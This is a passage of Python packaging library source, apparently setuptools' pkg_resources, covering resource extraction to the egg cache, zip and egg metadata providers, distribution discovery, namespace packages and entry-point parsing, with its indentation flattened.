if isinstance(other, Distribution):
self.add(other)
elif isinstance(other, Environment):
for project in other:
for dist in other[project]:
self.add(dist)
else:
raise TypeError("Can't add %r to environment" % (other,))
return self
def __add__(self, other):
"""Add an environment or distribution to an environment"""
new = self.__class__([], platform=None, python=None)
for env in self, other:
new += env
return new
# XXX backward compatibility
AvailableDistributions = Environment
class ExtractionError(RuntimeError):
"""An error occurred extracting a resource
The following attributes are available from instances of this exception:
manager
The resource manager that raised this exception
cache_path
The base directory for resource extraction
original_error
The exception instance that caused extraction to fail
"""
class ResourceManager:
"""Manage resource extraction and packages"""
extraction_path = None
def __init__(self):
self.cached_files = {}
def resource_exists(self, package_or_requirement, resource_name):
"""Does the named resource exist?"""
return get_provider(package_or_requirement).has_resource(resource_name)
def resource_isdir(self, package_or_requirement, resource_name):
"""Is the named resource an existing directory?"""
return get_provider(package_or_requirement).resource_isdir(
resource_name
)
def resource_filename(self, package_or_requirement, resource_name):
"""Return a true filesystem path for specified resource"""
return get_provider(package_or_requirement).get_resource_filename(
self, resource_name
)
def resource_stream(self, package_or_requirement, resource_name):
"""Return a readable file-like object for specified resource"""
return get_provider(package_or_requirement).get_resource_stream(
self, resource_name
)
def resource_string(self, package_or_requirement, resource_name):
"""Return specified resource as a string"""
return get_provider(package_or_requirement).get_resource_string(
self, resource_name
)
def resource_listdir(self, package_or_requirement, resource_name):
"""List the contents of the named resource directory"""
return get_provider(package_or_requirement).resource_listdir(
resource_name
)
def extraction_error(self):
"""Give an error message for problems extracting file(s)"""
old_exc = sys.exc_info()[1]
cache_path = self.extraction_path or get_default_cache()
tmpl = textwrap.dedent("""
Can't extract file(s) to egg cache
The following error occurred while trying to extract file(s) to the Python egg
cache:
{old_exc}
The Python egg cache directory is currently set to:
{cache_path}
Perhaps your account does not have write access to this directory? You can
change the cache directory by setting the PYTHON_EGG_CACHE environment
variable to point to an accessible directory.
""").lstrip()
err = ExtractionError(tmpl.format(**locals()))
err.manager = self
err.cache_path = cache_path
err.original_error = old_exc
raise err
def get_cache_path(self, archive_name, names=()):
"""Return absolute location in cache for `archive_name` and `names`
The parent directory of the resulting path will be created if it does
not already exist. `archive_name` should be the base filename of the
enclosing egg (which may not be the name of the enclosing zipfile!),
including its ".egg" extension. `names`, if provided, should be a
sequence of path name parts "under" the egg's extraction location.
This method should only be called by resource providers that need to
obtain an extraction location, and only for names they intend to
extract, as it tracks the generated names for possible cleanup later.
"""
extract_path = self.extraction_path or get_default_cache()
target_path = os.path.join(extract_path, archive_name + '-tmp', *names)
try:
_bypass_ensure_directory(target_path)
except:
self.extraction_error()
self._warn_unsafe_extraction_path(extract_path)
self.cached_files[target_path] = 1
return target_path
@staticmethod
def _warn_unsafe_extraction_path(path):
"""
If the default extraction path is overridden and set to an insecure
location, such as /tmp, it opens up an opportunity for an attacker to
replace an extracted file with an unauthorized payload. Warn the user
if a known insecure location is used.
See Distribute #375 for more details.
"""
if os.name == 'nt' and not path.startswith(os.environ['windir']):
# On Windows, permissions are generally restrictive by default
# and temp directories are not writable by other users, so
# bypass the warning.
return
mode = os.stat(path).st_mode
if mode & stat.S_IWOTH or mode & stat.S_IWGRP:
msg = ("%s is writable by group/others and vulnerable to attack "
"when "
"used with get_resource_filename. Consider a more secure "
"location (set with .set_extraction_path or the "
"PYTHON_EGG_CACHE environment variable)." % path)
warnings.warn(msg, UserWarning)
def postprocess(self, tempname, filename):
"""Perform any platform-specific postprocessing of `tempname`
This is where Mac header rewrites should be done; other platforms don't
have anything special they should do.
Resource providers should call this method ONLY after successfully
extracting a compressed resource. They must NOT call it on resources
that are already in the filesystem.
`tempname` is the current (temporary) name of the file, and `filename`
is the name it will be renamed to by the caller after this routine
returns.
"""
if os.name == 'posix':
# Make the resource executable
mode = ((os.stat(tempname).st_mode) | 0o555) & 0o7777
os.chmod(tempname, mode)
def set_extraction_path(self, path):
"""Set the base path where resources will be extracted to, if needed.
If you do not call this routine before any extractions take place, the
path defaults to the return value of ``get_default_cache()``. (Which
is based on the ``PYTHON_EGG_CACHE`` environment variable, with various
platform-specific fallbacks. See that routine's documentation for more
details.)
Resources are extracted to subdirectories of this path based upon
information given by the ``IResourceProvider``. You may set this to a
temporary directory, but then you must call ``cleanup_resources()`` to
delete the extracted files when done. There is no guarantee that
``cleanup_resources()`` will be able to remove all extracted files.
(Note: you may not change the extraction path for a given resource
manager once resources have been extracted, unless you first call
``cleanup_resources()``.)
"""
if self.cached_files:
raise ValueError(
"Can't change extraction path, files already extracted"
)
self.extraction_path = path
def cleanup_resources(self, force=False):
"""
Delete all extracted resource files and directories, returning a list
of the file and directory names that could not be successfully removed.
This function does not have any concurrency protection, so it should
generally only be called when the extraction path is a temporary
directory exclusive to a single process. This method is not
automatically called; you must call it explicitly or register it as an
``atexit`` function if you wish to ensure cleanup of a temporary
directory used for extractions.
"""
# XXX
def get_default_cache():
"""
Return the ``PYTHON_EGG_CACHE`` environment variable
or a platform-relevant user cache dir for an app
named "Python-Eggs".
"""
return (
os.environ.get('PYTHON_EGG_CACHE')
or appdirs.user_cache_dir(appname='Python-Eggs')
)
def safe_name(name):
"""Convert an arbitrary string to a standard distribution name
Any runs of non-alphanumeric/. characters are replaced with a single '-'.
"""
return re.sub('[^A-Za-z0-9.]+', '-', name)
def safe_version(version):
"""
Convert an arbitrary string to a standard version string
"""
try:
# normalize the version
return str(packaging.version.Version(version))
except packaging.version.InvalidVersion:
version = version.replace(' ', '.')
return re.sub('[^A-Za-z0-9.]+', '-', version)
def safe_extra(extra):
"""Convert an arbitrary string to a standard 'extra' name
Any runs of non-alphanumeric characters are replaced with a single '_',
and the result is always lowercased.
"""
return re.sub('[^A-Za-z0-9.-]+', '_', extra).lower()
def to_filename(name):
"""Convert a project or version name to its filename-escaped form
Any '-' characters are currently replaced with '_'.
"""
return name.replace('-', '_')
def invalid_marker(text):
"""
Validate text as a PEP 508 environment marker; return an exception
if invalid or False otherwise.
"""
try:
evaluate_marker(text)
except SyntaxError as e:
e.filename = None
e.lineno = None
return e
return False
def evaluate_marker(text, extra=None):
"""
Evaluate a PEP 508 environment marker.
Return a boolean indicating the marker result in this environment.
Raise SyntaxError if marker is invalid.
This implementation uses the 'pyparsing' module.
"""
try:
marker = packaging.markers.Marker(text)
return marker.evaluate()
except packaging.markers.InvalidMarker as e:
raise SyntaxError(e)
class NullProvider:
"""Try to implement resources and metadata for arbitrary PEP 302 loaders"""
egg_name = None
egg_info = None
loader = None
def __init__(self, module):
self.loader = getattr(module, '__loader__', None)
self.module_path = os.path.dirname(getattr(module, '__file__', ''))
def get_resource_filename(self, manager, resource_name):
return self._fn(self.module_path, resource_name)
def get_resource_stream(self, manager, resource_name):
return io.BytesIO(self.get_resource_string(manager, resource_name))
def get_resource_string(self, manager, resource_name):
return self._get(self._fn(self.module_path, resource_name))
def has_resource(self, resource_name):
return self._has(self._fn(self.module_path, resource_name))
def has_metadata(self, name):
return self.egg_info and self._has(self._fn(self.egg_info, name))
def get_metadata(self, name):
if not self.egg_info:
return ""
value = self._get(self._fn(self.egg_info, name))
return value.decode('utf-8') if six.PY3 else value
def get_metadata_lines(self, name):
return yield_lines(self.get_metadata(name))
def resource_isdir(self, resource_name):
return self._isdir(self._fn(self.module_path, resource_name))
def metadata_isdir(self, name):
return self.egg_info and self._isdir(self._fn(self.egg_info, name))
def resource_listdir(self, resource_name):
return self._listdir(self._fn(self.module_path, resource_name))
def metadata_listdir(self, name):
if self.egg_info:
return self._listdir(self._fn(self.egg_info, name))
return []
def run_script(self, script_name, namespace):
script = 'scripts/' + script_name
if not self.has_metadata(script):
raise ResolutionError("No script named %r" % script_name)
script_text = self.get_metadata(script).replace('\r\n', '\n')
script_text = script_text.replace('\r', '\n')
script_filename = self._fn(self.egg_info, script)
namespace['__file__'] = script_filename
if os.path.exists(script_filename):
source = open(script_filename).read()
code = compile(source, script_filename, 'exec')
exec(code, namespace, namespace)
else:
from linecache import cache
cache[script_filename] = (
len(script_text), 0, script_text.split('\n'), script_filename
)
script_code = compile(script_text, script_filename, 'exec')
exec(script_code, namespace, namespace)
def _has(self, path):
raise NotImplementedError(
"Can't perform this operation for unregistered loader type"
)
def _isdir(self, path):
raise NotImplementedError(
"Can't perform this operation for unregistered loader type"
)
def _listdir(self, path):
raise NotImplementedError(
"Can't perform this operation for unregistered loader type"
)
def _fn(self, base, resource_name):
if resource_name:
return os.path.join(base, *resource_name.split('/'))
return base
def _get(self, path):
if hasattr(self.loader, 'get_data'):
return self.loader.get_data(path)
raise NotImplementedError(
"Can't perform this operation for loaders without 'get_data()'"
)
register_loader_type(object, NullProvider)
class EggProvider(NullProvider):
"""Provider based on a virtual filesystem"""
def __init__(self, module):
NullProvider.__init__(self, module)
self._setup_prefix()
def _setup_prefix(self):
# we assume here that our metadata may be nested inside a "basket"
# of multiple eggs; that's why we use module_path instead of .archive
path = self.module_path
old = None
while path != old:
if _is_unpacked_egg(path):
self.egg_name = os.path.basename(path)
self.egg_info = os.path.join(path, 'EGG-INFO')
self.egg_root = path
break
old = path
path, base = os.path.split(path)
class DefaultProvider(EggProvider):
"""Provides access to package resources in the filesystem"""
def _has(self, path):
return os.path.exists(path)
def _isdir(self, path):
return os.path.isdir(path)
def _listdir(self, path):
return os.listdir(path)
def get_resource_stream(self, manager, resource_name):
return open(self._fn(self.module_path, resource_name), 'rb')
def _get(self, path):
with open(path, 'rb') as stream:
return stream.read()
@classmethod
def _register(cls):
loader_cls = getattr(importlib_machinery, 'SourceFileLoader',
type(None))
register_loader_type(loader_cls, cls)
DefaultProvider._register()
class EmptyProvider(NullProvider):
"""Provider that returns nothing for all requests"""
_isdir = _has = lambda self, path: False
_get = lambda self, path: ''
_listdir = lambda self, path: []
module_path = None
def __init__(self):
pass
empty_provider = EmptyProvider()
class ZipManifests(dict):
"""
zip manifest builder
"""
@classmethod
def build(cls, path):
"""
Build a dictionary similar to the zipimport directory
caches, except instead of tuples, store ZipInfo objects.
Use a platform-specific path separator (os.sep) for the path keys
for compatibility with pypy on Windows.
"""
with ContextualZipFile(path) as zfile:
items = (
(
name.replace('/', os.sep),
zfile.getinfo(name),
)
for name in zfile.namelist()
)
return dict(items)
load = build
class MemoizedZipManifests(ZipManifests):
"""
Memoized zipfile manifests.
"""
manifest_mod = collections.namedtuple('manifest_mod', 'manifest mtime')
def load(self, path):
"""
Load a manifest at path or return a suitable manifest already loaded.
"""
path = os.path.normpath(path)
mtime = os.stat(path).st_mtime
if path not in self or self[path].mtime != mtime:
manifest = self.build(path)
self[path] = self.manifest_mod(manifest, mtime)
return self[path].manifest
class ContextualZipFile(zipfile.ZipFile):
"""
Supplement ZipFile class to support context manager for Python 2.6
"""
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def __new__(cls, *args, **kwargs):
"""
Construct a ZipFile or ContextualZipFile as appropriate
"""
if hasattr(zipfile.ZipFile, '__exit__'):
return zipfile.ZipFile(*args, **kwargs)
return super(ContextualZipFile, cls).__new__(cls)
class ZipProvider(EggProvider):
"""Resource support for zips and eggs"""
eagers = None
_zip_manifests = MemoizedZipManifests()
def __init__(self, module):
EggProvider.__init__(self, module)
self.zip_pre = self.loader.archive + os.sep
def _zipinfo_name(self, fspath):
# Convert a virtual filename (full path to file) into a zipfile subpath
# usable with the zipimport directory cache for our target archive
if fspath.startswith(self.zip_pre):
return fspath[len(self.zip_pre):]
raise AssertionError(
"%s is not a subpath of %s" % (fspath, self.zip_pre)
)
def _parts(self, zip_path):
# Convert a zipfile subpath into an egg-relative path part list.
# pseudo-fs path
fspath = self.zip_pre + zip_path
if fspath.startswith(self.egg_root + os.sep):
return fspath[len(self.egg_root) + 1:].split(os.sep)
raise AssertionError(
"%s is not a subpath of %s" % (fspath, self.egg_root)
)
@property
def zipinfo(self):
return self._zip_manifests.load(self.loader.archive)
def get_resource_filename(self, manager, resource_name):
if not self.egg_name:
raise NotImplementedError(
"resource_filename() only supported for .egg, not .zip"
)
# no need to lock for extraction, since we use temp names
zip_path = self._resource_to_zip(resource_name)
eagers = self._get_eager_resources()
if '/'.join(self._parts(zip_path)) in eagers:
for name in eagers:
self._extract_resource(manager, self._eager_to_zip(name))
return self._extract_resource(manager, zip_path)
@staticmethod
def _get_date_and_size(zip_stat):
size = zip_stat.file_size
# ymdhms+wday, yday, dst
date_time = zip_stat.date_time + (0, 0, -1)
# 1980 offset already done
timestamp = time.mktime(date_time)
return timestamp, size
def _extract_resource(self, manager, zip_path):
if zip_path in self._index():
for name in self._index()[zip_path]:
last = self._extract_resource(
manager, os.path.join(zip_path, name)
)
# return the extracted directory name
return os.path.dirname(last)
timestamp, size = self._get_date_and_size(self.zipinfo[zip_path])
if not WRITE_SUPPORT:
raise IOError('"os.rename" and "os.unlink" are not supported '
'on this platform')
try:
real_path = manager.get_cache_path(
self.egg_name, self._parts(zip_path)
)
if self._is_current(real_path, zip_path):
return real_path
outf, tmpnam = _mkstemp(".$extract", dir=os.path.dirname(real_path))
os.write(outf, self.loader.get_data(zip_path))
os.close(outf)
utime(tmpnam, (timestamp, timestamp))
manager.postprocess(tmpnam, real_path)
try:
rename(tmpnam, real_path)
except os.error:
if os.path.isfile(real_path):
if self._is_current(real_path, zip_path):
# the file became current since it was checked above,
# so proceed.
return real_path
# Windows, del old file and retry
elif os.name == 'nt':
unlink(real_path)
rename(tmpnam, real_path)
return real_path
raise
except os.error:
# report a user-friendly error
manager.extraction_error()
return real_path
def _is_current(self, file_path, zip_path):
"""
Return True if the file_path is current for this zip_path
"""
timestamp, size = self._get_date_and_size(self.zipinfo[zip_path])
if not os.path.isfile(file_path):
return False
stat = os.stat(file_path)
if stat.st_size != size or stat.st_mtime != timestamp:
return False
# check that the contents match
zip_contents = self.loader.get_data(zip_path)
with open(file_path, 'rb') as f:
file_contents = f.read()
return zip_contents == file_contents
def _get_eager_resources(self):
if self.eagers is None:
eagers = []
for name in ('native_libs.txt', 'eager_resources.txt'):
if self.has_metadata(name):
eagers.extend(self.get_metadata_lines(name))
self.eagers = eagers
return self.eagers
def _index(self):
try:
return self._dirindex
except AttributeError:
ind = {}
for path in self.zipinfo:
parts = path.split(os.sep)
while parts:
parent = os.sep.join(parts[:-1])
if parent in ind:
ind[parent].append(parts[-1])
break
else:
ind[parent] = [parts.pop()]
self._dirindex = ind
return ind
def _has(self, fspath):
zip_path = self._zipinfo_name(fspath)
return zip_path in self.zipinfo or zip_path in self._index()
def _isdir(self, fspath):
return self._zipinfo_name(fspath) in self._index()
def _listdir(self, fspath):
return list(self._index().get(self._zipinfo_name(fspath), ()))
def _eager_to_zip(self, resource_name):
return self._zipinfo_name(self._fn(self.egg_root, resource_name))
def _resource_to_zip(self, resource_name):
return self._zipinfo_name(self._fn(self.module_path, resource_name))
register_loader_type(zipimport.zipimporter, ZipProvider)
class FileMetadata(EmptyProvider):
"""Metadata handler for standalone PKG-INFO files
Usage::
metadata = FileMetadata("/path/to/PKG-INFO")
This provider rejects all data and metadata requests except for PKG-INFO,
which is treated as existing, and will be the contents of the file at
the provided location.
"""
def __init__(self, path):
self.path = path
def has_metadata(self, name):
return name == 'PKG-INFO' and os.path.isfile(self.path)
def get_metadata(self, name):
if name != 'PKG-INFO':
raise KeyError("No metadata except PKG-INFO is available")
with io.open(self.path, encoding='utf-8', errors="replace") as f:
metadata = f.read()
self._warn_on_replacement(metadata)
return metadata
def _warn_on_replacement(self, metadata):
# Python 2.6 and 3.2 compat for: replacement_char = '�'
replacement_char = b'\xef\xbf\xbd'.decode('utf-8')
if replacement_char in metadata:
tmpl = "{self.path} could not be properly decoded in UTF-8"
msg = tmpl.format(**locals())
warnings.warn(msg)
def get_metadata_lines(self, name):
return yield_lines(self.get_metadata(name))
class PathMetadata(DefaultProvider):
"""Metadata provider for egg directories
Usage::
# Development eggs:
egg_info = "/path/to/PackageName.egg-info"
base_dir = os.path.dirname(egg_info)
metadata = PathMetadata(base_dir, egg_info)
dist_name = os.path.splitext(os.path.basename(egg_info))[0]
dist = Distribution(basedir, project_name=dist_name, metadata=metadata)
# Unpacked egg directories:
egg_path = "/path/to/PackageName-ver-pyver-etc.egg"
metadata = PathMetadata(egg_path, os.path.join(egg_path,'EGG-INFO'))
dist = Distribution.from_filename(egg_path, metadata=metadata)
"""
def __init__(self, path, egg_info):
self.module_path = path
self.egg_info = egg_info
class EggMetadata(ZipProvider):
"""Metadata provider for .egg files"""
def __init__(self, importer):
"""Create a metadata provider from a zipimporter"""
self.zip_pre = importer.archive + os.sep
self.loader = importer
if importer.prefix:
self.module_path = os.path.join(importer.archive, importer.prefix)
else:
self.module_path = importer.archive
self._setup_prefix()
_declare_state('dict', _distribution_finders={})
def register_finder(importer_type, distribution_finder):
"""Register `distribution_finder` to find distributions in sys.path items
`importer_type` is the type or class of a PEP 302 "Importer" (sys.path item
handler), and `distribution_finder` is a callable that, passed a path
item and the importer instance, yields ``Distribution`` instances found on
that path item. See ``pkg_resources.find_on_path`` for an example."""
_distribution_finders[importer_type] = distribution_finder
def find_distributions(path_item, only=False):
"""Yield distributions accessible via `path_item`"""
importer = get_importer(path_item)
finder = _find_adapter(_distribution_finders, importer)
return finder(importer, path_item, only)
def find_eggs_in_zip(importer, path_item, only=False):
"""
Find eggs in zip files; possibly multiple nested eggs.
"""
if importer.archive.endswith('.whl'):
# wheels are not supported with this finder
# they don't have PKG-INFO metadata, and won't ever contain eggs
return
metadata = EggMetadata(importer)
if metadata.has_metadata('PKG-INFO'):
yield Distribution.from_filename(path_item, metadata=metadata)
if only:
# don't yield nested distros
return
for subitem in metadata.resource_listdir('/'):
if _is_unpacked_egg(subitem):
subpath = os.path.join(path_item, subitem)
for dist in find_eggs_in_zip(zipimport.zipimporter(subpath), subpath):
yield dist
register_finder(zipimport.zipimporter, find_eggs_in_zip)
def find_nothing(importer, path_item, only=False):
return ()
register_finder(object, find_nothing)
def find_on_path(importer, path_item, only=False):
"""Yield distributions accessible on a sys.path directory"""
path_item = _normalize_cached(path_item)
if os.path.isdir(path_item) and os.access(path_item, os.R_OK):
if _is_unpacked_egg(path_item):
yield Distribution.from_filename(
path_item, metadata=PathMetadata(
path_item, os.path.join(path_item, 'EGG-INFO')
)
)
else:
# scan for .egg and .egg-info in directory
path_item_entries = os.listdir(path_item)
# Reverse so we find the newest version of a distribution,
path_item_entries.sort()
path_item_entries.reverse()
for entry in path_item_entries:
lower = entry.lower()
if lower.endswith('.egg-info') or lower.endswith('.dist-info'):
fullpath = os.path.join(path_item, entry)
if os.path.isdir(fullpath):
# egg-info directory, allow getting metadata
if len(os.listdir(fullpath)) == 0:
# Empty egg directory, skip.
continue
metadata = PathMetadata(path_item, fullpath)
else:
metadata = FileMetadata(fullpath)
yield Distribution.from_location(
path_item, entry, metadata, precedence=DEVELOP_DIST
)
elif not only and _is_unpacked_egg(entry):
dists = find_distributions(os.path.join(path_item, entry))
for dist in dists:
yield dist
elif not only and lower.endswith('.egg-link'):
with open(os.path.join(path_item, entry)) as entry_file:
entry_lines = entry_file.readlines()
for line in entry_lines:
if not line.strip():
continue
path = os.path.join(path_item, line.rstrip())
dists = find_distributions(path)
for item in dists:
yield item
break
register_finder(pkgutil.ImpImporter, find_on_path)
if hasattr(importlib_machinery, 'FileFinder'):
register_finder(importlib_machinery.FileFinder, find_on_path)
_declare_state('dict', _namespace_handlers={})
_declare_state('dict', _namespace_packages={})
def register_namespace_handler(importer_type, namespace_handler):
"""Register `namespace_handler` to declare namespace packages
`importer_type` is the type or class of a PEP 302 "Importer" (sys.path item
handler), and `namespace_handler` is a callable like this::
def namespace_handler(importer, path_entry, moduleName, module):
# return a path_entry to use for child packages
Namespace handlers are only called if the importer object has already
agreed that it can handle the relevant path item, and they should only
return a subpath if the module __path__ does not already contain an
equivalent subpath. For an example namespace handler, see
``pkg_resources.file_ns_handler``.
"""
_namespace_handlers[importer_type] = namespace_handler
def _handle_ns(packageName, path_item):
"""Ensure that named package includes a subpath of path_item (if needed)"""
importer = get_importer(path_item)
if importer is None:
return None
loader = importer.find_module(packageName)
if loader is None:
return None
module = sys.modules.get(packageName)
if module is None:
module = sys.modules[packageName] = types.ModuleType(packageName)
module.__path__ = []
_set_parent_ns(packageName)
elif not hasattr(module, '__path__'):
raise TypeError("Not a package:", packageName)
handler = _find_adapter(_namespace_handlers, importer)
subpath = handler(importer, path_item, packageName, module)
if subpath is not None:
path = module.__path__
path.append(subpath)
loader.load_module(packageName)
_rebuild_mod_path(path, packageName, module)
return subpath
def _rebuild_mod_path(orig_path, package_name, module):
"""
Rebuild module.__path__ ensuring that all entries are ordered
corresponding to their sys.path order
"""
sys_path = [_normalize_cached(p) for p in sys.path]
def safe_sys_path_index(entry):
"""
Workaround for #520 and #513.
"""
try:
return sys_path.index(entry)
except ValueError:
return float('inf')
def position_in_sys_path(path):
"""
Return the ordinal of the path based on its position in sys.path
"""
path_parts = path.split(os.sep)
module_parts = package_name.count('.') + 1
parts = path_parts[:-module_parts]
return safe_sys_path_index(_normalize_cached(os.sep.join(parts)))
orig_path.sort(key=position_in_sys_path)
module.__path__[:] = [_normalize_cached(p) for p in orig_path]
def declare_namespace(packageName):
"""Declare that package 'packageName' is a namespace package"""
_imp.acquire_lock()
try:
if packageName in _namespace_packages:
return
path, parent = sys.path, None
if '.' in packageName:
parent = '.'.join(packageName.split('.')[:-1])
declare_namespace(parent)
if parent not in _namespace_packages:
__import__(parent)
try:
path = sys.modules[parent].__path__
except AttributeError:
raise TypeError("Not a package:", parent)
# Track what packages are namespaces, so when new path items are added,
# they can be updated
_namespace_packages.setdefault(parent, []).append(packageName)
_namespace_packages.setdefault(packageName, [])
for path_item in path:
# Ensure all the parent's path items are reflected in the child,
# if they apply
_handle_ns(packageName, path_item)
finally:
_imp.release_lock()
def fixup_namespace_packages(path_item, parent=None):
"""Ensure that previously-declared namespace packages include path_item"""
_imp.acquire_lock()
try:
for package in _namespace_packages.get(parent, ()):
subpath = _handle_ns(package, path_item)
if subpath:
fixup_namespace_packages(subpath, package)
finally:
_imp.release_lock()
def file_ns_handler(importer, path_item, packageName, module):
"""Compute an ns-package subpath for a filesystem or zipfile importer"""
subpath = os.path.join(path_item, packageName.split('.')[-1])
normalized = _normalize_cached(subpath)
for item in module.__path__:
if _normalize_cached(item) == normalized:
break
else:
# Only return the path if it's not already there
return subpath
register_namespace_handler(pkgutil.ImpImporter, file_ns_handler)
register_namespace_handler(zipimport.zipimporter, file_ns_handler)
if hasattr(importlib_machinery, 'FileFinder'):
register_namespace_handler(importlib_machinery.FileFinder, file_ns_handler)
def null_ns_handler(importer, path_item, packageName, module):
return None
register_namespace_handler(object, null_ns_handler)
def normalize_path(filename):
"""Normalize a file/dir name for comparison purposes"""
return os.path.normcase(os.path.realpath(filename))
def _normalize_cached(filename, _cache={}):
try:
return _cache[filename]
except KeyError:
_cache[filename] = result = normalize_path(filename)
return result
def _is_unpacked_egg(path):
"""
Determine if given path appears to be an unpacked egg.
"""
return (
path.lower().endswith('.egg')
)
def _set_parent_ns(packageName):
parts = packageName.split('.')
name = parts.pop()
if parts:
parent = '.'.join(parts)
setattr(sys.modules[parent], name, sys.modules[packageName])
def yield_lines(strs):
"""Yield non-empty/non-comment lines of a string or sequence"""
if isinstance(strs, six.string_types):
for s in strs.splitlines():
s = s.strip()
# skip blank lines/comments
if s and not s.startswith('#'):
yield s
else:
for ss in strs:
for s in yield_lines(ss):
yield s
MODULE = re.compile(r"\w+(\.\w+)*$").match
EGG_NAME = re.compile(
r"""
(?P<name>[^-]+) (
-(?P<ver>[^-]+) (
-py(?P<pyver>[^-]+) (
-(?P<plat>.+)
)?
)?
)?
""",
re.VERBOSE | re.IGNORECASE,
).match
class EntryPoint(object):
"""Object representing an advertised importable object"""
def __init__(self, name, module_name, attrs=(), extras=(), dist=None):
if not MODULE(module_name):
raise ValueError("Invalid module name", module_name)
self.name = name
self.module_name = module_name
self.attrs = tuple(attrs)
self.extras = Requirement.parse(("x[%s]" % ','.join(extras))).extras
self.dist = dist
def __str__(self):
s = "%s = %s" % (self.name, self.module_name)
if self.attrs:
s += ':' + '.'.join(self.attrs)
if self.extras:
s += ' [%s]' % ','.join(self.extras)
return s
def __repr__(self):
return "EntryPoint.parse(%r)" % str(self)
def load(self, require=True, *args, **kwargs):
"""
Require packages for this EntryPoint, then resolve it.
"""
if not require or args or kwargs:
warnings.warn(
"Parameters to load are deprecated. Call .resolve and "
".require separately.",
DeprecationWarning,
stacklevel=2,
)
if require:
self.require(*args, **kwargs)
return self.resolve()
def resolve(self):
"""
Resolve the entry point from its module and attrs.
"""
module = __import__(self.module_name, fromlist=['__name__'], level=0)
try:
return functools.reduce(getattr, self.attrs, module)
except AttributeError as exc:
raise ImportError(str(exc))
def require(self, env=None, installer=None):
if self.extras and not self.dist:
raise UnknownExtra("Can't require() without a distribution", self)
reqs = self.dist.requires(self.extras)
items = working_set.resolve(reqs, env, installer)
list(map(working_set.add, items))
pattern = re.compile(
r'\s*'
r'(?P<name>.+?)\s*'
r'=\s*'
r'(?P<module>[\w.]+)\s*'
r'(:\s*(?P<attr>[\w.]+))?\s*'
r'(?P<extras>\[.*\])?\s*$'
)
@classmethod
def parse(cls, src, dist=None):
"""Parse a single entry point from string `src`
Entry point syntax follows the form::
name = some.module:some.attr [extra1, extra2]
The entry name and module name are required, but the ``:attrs`` and
``[extras]`` parts are optional
"""
m = cls.pattern.match(src)
if not m:
msg = "EntryPoint must be in 'name=module:attrs [extras]' format"
raise ValueError(msg, src)
res = m.groupdict()
extras = cls._parse_extras(res['extras'])
attrs = res['attr'].split('.') if res['attr'] else ()
return cls(res['name'], res['module'], attrs, extras, dist)
@classmethod
def _parse_extras(cls, extras_spec):
if not extras_spec:
return ()
req = Requirement.parse('x' + extras_spec)
if req.specs:
raise ValueError()
return req.extras
@classmethod
def parse_group(cls, group, lines, dist=None):
"""Parse an entry point group"""
if not MODULE(group):
raise ValueError("Invalid group name", group)
this = {}
for line in yield_lines(lines):
ep = cls.parse(line, dist)
if ep.name in this:
raise ValueError("Duplicate entry point", group, ep.name)
this[ep.name] = ep
return this
@classmethod
def parse_map(cls, data, dist=None):
"""Parse a map of entry point groups"""
if isinstance(data, dict):
data = data.items()
else:
data = split_sections(data)
maps = {}
for group, lines in data:
if group is None:
if not lines:
continue
raise ValueError("Entry points must be listed in groups")
group = group.strip()
if group in maps:
raise ValueError("Duplicate group name", group)
maps[group] = cls.parse_group(group, lines, dist)
return maps
def _remove_md5_fragment(location):
if not location:
return ''
parsed = urllib.parse.urlparse(location)
if parsed[-1].startswith('md5='):
return urllib.parse.urlunparse(parsed[:-1] + ('',))
return location
def _version_from_file(lines):
"""
Given an iterable of lines from a Metadata file, return
the value of the Version field, if present, or None otherwise.
"""
is_version_line = lambda line: line.lower().startswith('version:')
version_lines = filter(is_version_line, lines)
line = next(iter(version_lines), '')
_, _, value = line.partition(':')
return safe_version(value.strip()) or None
class Distribution(object):
"""Wrap an actual or potential sys.path entry w/metadata"""
PKG_INFO = 'PKG-INFO'
def __init__(self, location=None, metadata=None, project_name=None,
version=None, py_version=PY_MAJOR, platform=None,
precedence=EGG_DIST):
self.project_name = safe_name(project_name or 'Unknown')
if version is not None:
self._version = safe_version(version)
self.py_version = py_version
self.platform = platform
self.location = location
self.precedence = precedence
self._provider = metadata or empty_provider
@classmethod
def from_location(cls, location, basename, metadata=None, **kw):
project_name, version, py_version, platform = [None] * 4
basename, ext = os.path.splitext(basename)
if ext.lower() in _distributionImpl:
cls = _distributionImpl[ext.lower()]
match = EGG_NAME(basename)
if match:
project_name, version, py_version, platform = match.group(
'name', 'ver', 'pyver', 'plat'
)
return cls(
location, metadata, project_name=project_name, version=version,
py_version=py_version, platform=platform, **kw
)._reload_version()
def _reload_version(self):
return self
@property
def hashcmp(self):
return (
self.parsed_version,
self.precedence,
self.key,
_remove_md5_fragment(self.location),
self.py_version or '',
self.platform or '',
)
def __hash__(self):
return hash(self.hashcmp)
def __lt__(self, other):
return self.hashcmp < other.hashcmp
def __le__(self, other):
return self.hashcmp <= other.hashcmp
def __gt__(self, other):
return self.hashcmp > other.hashcmp
def __ge__(self, other):
return self.hashcmp >= other.hashcmp
def __eq__(self, other):
if not isinstance(other, self.__class__):
# It's not a Distribution, so they are not equal
return False
return self.hashcmp == other.hashcmp
def __ne__(self, other):
return not self == other
# These properties have to be lazy so that we don't have to load any
# metadata until/unless it's actually needed. (i.e., some distributions
# may not know their name or version without loading PKG-INFO)
@property
def key(self):
try:
return self._key
except AttributeError:
self._key = key = self.project_name.lower()
return key
@property
def parsed_version(self):
if not hasattr(self, "_parsed_version"):
self._parsed_version = parse_version(self.version)
return self._parsed_version
def _warn_legacy_version(self):
LV = packaging.version.LegacyVersion
is_legacy = isinstance(self._parsed_version, LV)
if not is_legacy:
return
# While an empty version is technically a legacy version and
# is not a valid PEP 440 version, it's also unlikely to
# actually come from someone and instead it is more likely that
# it comes from setuptools attempting to parse a filename and
# including it in the list. So for that we'll gate this warning
# on if the version is anything at all or not.
if not self.version:
return
tmpl = textwrap.dedent("""
'{project_name} ({version})' is being parsed as a legacy,
non PEP 440,
version. You may find odd behavior and sort order.
In particular it will be sorted as less than 0.0. It
is recommended to migrate to PEP 440 compatible
versions.
""").strip().replace('\n', ' ')
warnings.warn(tmpl.format(**vars(self)), PEP440Warning)
@property
def version(self):
try:
return self._version
except AttributeError:
version = _version_from_file(self._get_metadata(self.PKG_INFO))
if version is None:
tmpl = "Missing 'Version:' header and/or %s file"
raise ValueError(tmpl % self.PKG_INFO, self)
return version
@property
def _dep_map(self):
try:
return self.__dep_map
except AttributeError:
dm = self.__dep_map = {None: []}
for name in 'requires.txt', 'depends.txt':
for extra, reqs in split_sections(self._get_metadata(name)):
if extra:
if ':' in extra:
